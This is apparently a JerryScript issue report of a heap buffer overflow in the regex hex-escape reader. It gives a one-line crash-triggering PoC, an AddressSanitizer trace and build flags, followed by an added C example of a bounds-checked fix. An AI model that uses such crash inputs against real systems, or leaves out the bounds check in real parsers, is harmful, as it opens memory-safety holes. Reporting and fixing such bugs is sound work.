heap-buffer-overflow in lit_read_code_unit_from_hex #2140

Closed
@zhunki

The following PoC can trigger a heap buffer overflow bug.

RegExp("[\x0");

==3847==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb580075d at pc 0x081224b6 bp 0xbfb5e7f8 sp 0xbfb5e7e8
READ of size 1 at 0xb580075d thread T0
#0 0x81224b5 in lit_read_code_unit_from_hex /home/b/jerryscript/jerry-core/lit/lit-char-helpers.c:443
#1 0x81901c2 in re_parse_char_class /home/b/jerryscript/jerry-core/parser/regexp/re-parser.c:434
#2 0x818bd71 in re_parse_alternative /home/b/jerryscript/jerry-core/parser/regexp/re-compiler.c:390
#3 0x818d717 in re_compile_bytecode /home/b/jerryscript/jerry-core/parser/regexp/re-compiler.c:560
#4 0x8106af7 in ecma_op_create_regexp_object /home/b/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:292
#5 0x80af355 in ecma_builtin_regexp_dispatch_construct /home/b/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:136
#6 0x80ae0dd in ecma_builtin_dispatch_call /home/b/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.inc.h:171
#7 0x80fbd5e in ecma_op_function_call /home/b/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:341
#8 0x81a83c6 in opfunc_call /home/b/jerryscript/jerry-core/vm/vm.c:425
#9 0x81a83c6 in vm_execute /home/b/jerryscript/jerry-core/vm/vm.c:2862
#10 0x81a9dd5 in vm_run /home/b/jerryscript/jerry-core/vm/vm.c:2942
#11 0x81a9dd5 in vm_run_global /home/b/jerryscript/jerry-core/vm/vm.c:232
#12 0x8058201 in jerry_run /home/b/jerryscript/jerry-core/api/jerry.c:558
#13 0x804c503 in main /home/b/jerryscript/jerry-main/main-unix.c:664
#14 0xb6fc2636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
#15 0x804fc9d (/home/b/jerryscript/build/bin/jerry+0x804fc9d)

0xb580075d is located 0 bytes to the right of 13-byte region [0xb5800750,0xb580075d)
allocated by thread T0 here:
#0 0xb71f6dee in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96dee)
#1 0x804f4c4 in jmem_heap_alloc_block_internal /home/b/jerryscript/jerry-core/jmem/jmem-heap.c:324
#2 0x804f4c4 in jmem_heap_gc_and_alloc_block /home/b/jerryscript/jerry-core/jmem/jmem-heap.c:360
#3 0x804f4c4 in jmem_heap_alloc_block /home/b/jerryscript/jerry-core/jmem/jmem-heap.c:406
#4 0x806ab0b in ecma_new_ecma_string_from_utf8 /home/b/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:190
#5 0x8064a63 in ecma_find_or_create_literal_string /home/b/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:73
#6 0x812ccbb in parser_compute_indicies /home/b/jerryscript/jerry-core/parser/js/js-parser.c:201
#7 0x812ccbb in parser_post_processing /home/b/jerryscript/jerry-core/parser/js/js-parser.c:1421
#8 0x8139743 in parser_parse_source /home/b/jerryscript/jerry-core/parser/js/js-parser.c:2215
#9 0x813b528 in parser_parse_script /home/b/jerryscript/jerry-core/parser/js/js-parser.c:2712
#10 0x80578b1 in jerry_parse /home/b/jerryscript/jerry-core/api/jerry.c:384
#11 0x80578b1 in jerry_parse_named_resource /home/b/jerryscript/jerry-core/api/jerry.c:442
#12 0x804c49d in main /home/b/jerryscript/jerry-main/main-unix.c:655
#13 0xb6fc2636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/b/jerryscript/jerry-core/lit/lit-char-helpers.c:443 lit_read_code_unit_from_hex
Shadow bytes around the buggy address:
0x36b00090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b000a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b000b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b000c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b000d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fa
=>0x36b000e0: fa fa 00 fa fa fa 00 00 fa fa 00[05]fa fa fd fa
0x36b000f0: fa fa 00 05 fa fa 00 02 fa fa 00 06 fa fa 00 00
0x36b00100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b00110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b00120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b00130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==3847==ABORTING

The platform is Ubuntu 16.04 and the build options are:
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --jerry-libc=off --static-link=off --lto=off --error-message=on --system-allocator=on
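As an added example, and not code from this report or from JerryScript itself, the C program below shows the check a hex-escape reader inside a character-class scanner needs for a pattern such as `[\x0`: the reader is given the end of the source range and refuses to consume hex digits that are not there, so the scanner returns an error instead of reading past the end of the pattern. The names `read_code_unit_from_hex`, `parse_char_class` and `cc_status` are hypothetical, the inputs are constructed, and each pattern is copied into an exactly sized `malloc` block with no terminator so that a `-fsanitize=address` build would report any over-read as a heap-buffer-overflow, the way the trace above does.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Example code, not JerryScript's. All names are hypothetical. The pattern is a
 * byte range [p, end) with no terminator, which is how a literal kept in a heap
 * block has to be treated. */

typedef enum { CC_OK = 0, CC_ERR_TRUNCATED, CC_ERR_BAD_HEX, CC_ERR_SYNTAX } cc_status;

static int hex_value(uint8_t c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Read exactly `digits` hex digits from [*p, end) into *out and advance *p.
 * Returns false, without touching any byte at or past `end`, when fewer than
 * `digits` bytes remain or one of them is not a hex digit. The remaining-length
 * check is the point of the example: without it a pattern ending in "\x0" makes
 * the reader fetch the missing second digit from beyond the source buffer. */
static bool read_code_unit_from_hex(const uint8_t **p, const uint8_t *end,
                                    size_t digits, uint16_t *out)
{
    if ((size_t)(end - *p) < digits) return false;
    uint16_t v = 0;
    for (size_t i = 0; i < digits; i++) {
        int h = hex_value((*p)[i]);
        if (h < 0) return false;
        v = (uint16_t)((v << 4) | (uint16_t)h);
    }
    *p += digits;
    *out = v;
    return true;
}

/* Decode a character class "[...]" into UTF-16 code units. Handles \xHH and
 * \uHHHH; any other escaped byte is taken literally (enough for the demo). */
static cc_status parse_char_class(const uint8_t *pattern, size_t len,
                                  uint16_t *out, size_t cap, size_t *n_out)
{
    const uint8_t *p = pattern, *end = pattern + len;
    size_t n = 0;
    if (p == end || *p != '[') return CC_ERR_SYNTAX;
    p++;
    while (p < end && *p != ']') {
        uint16_t cu;
        if (*p == '\\') {
            if (++p == end) return CC_ERR_TRUNCATED;      /* pattern ends in "\" */
            uint8_t esc = *p++;
            if (esc == 'x' || esc == 'u') {
                size_t digits = (esc == 'x') ? 2 : 4;
                if (!read_code_unit_from_hex(&p, end, digits, &cu))
                    return (size_t)(end - p) < digits ? CC_ERR_TRUNCATED : CC_ERR_BAD_HEX;
            } else {
                cu = esc;
            }
        } else {
            cu = *p++;
        }
        if (n == cap) return CC_ERR_SYNTAX;                /* output exhausted */
        out[n++] = cu;
    }
    if (p == end) return CC_ERR_TRUNCATED;                 /* no closing "]" */
    *n_out = n;
    return CC_OK;
}

/* Copy a C string into an exactly sized heap block with no NUL terminator, so
 * that under AddressSanitizer any read past the pattern is reported as a
 * heap-buffer-overflow rather than silently returning the terminator. */
static cc_status parse_cstr(const char *s, uint16_t *out, size_t cap, size_t *n_out)
{
    size_t len = strlen(s);
    uint8_t *buf = malloc(len ? len : 1);
    if (!buf) abort();
    memcpy(buf, s, len);
    cc_status st = parse_char_class(buf, len, out, cap, n_out);
    free(buf);
    return st;
}

/* Single-value wrappers: status, number of decoded units, i-th unit (0 on error). */
static cc_status classify(const char *s)
{
    uint16_t out[16]; size_t n = 0;
    return parse_cstr(s, out, 16, &n);
}

static size_t decode_count(const char *s)
{
    uint16_t out[16]; size_t n = 0;
    return parse_cstr(s, out, 16, &n) == CC_OK ? n : 0;
}

static uint16_t decode_unit(const char *s, size_t i)
{
    uint16_t out[16]; size_t n = 0;
    if (parse_cstr(s, out, 16, &n) != CC_OK || i >= n) return 0;
    return out[i];
}

int main(void)
{
    /* Constructed inputs: the report's pattern bytes "[\x0" plus three controls. */
    const char *cases[] = { "[\\x0", "[\\x41-\\u0042]", "[\\xZZ]", "[abc" };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-16s -> status %d, %zu units\n", cases[i],
               (int)classify(cases[i]), decode_count(cases[i]));
    return 0;
}
```

Build it with the same `-fsanitize=address -fno-omit-frame-pointer` flags used in the report; removing the `end - *p` check in `read_code_unit_from_hex` reproduces the shape of the failure (a one-byte read just past an exactly sized heap block) on the `[\x0` input, while the checked version returns `CC_ERR_TRUNCATED`.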

Labels: bug (Undesired behaviour), ecma builtins (Related to ECMA built-in routines)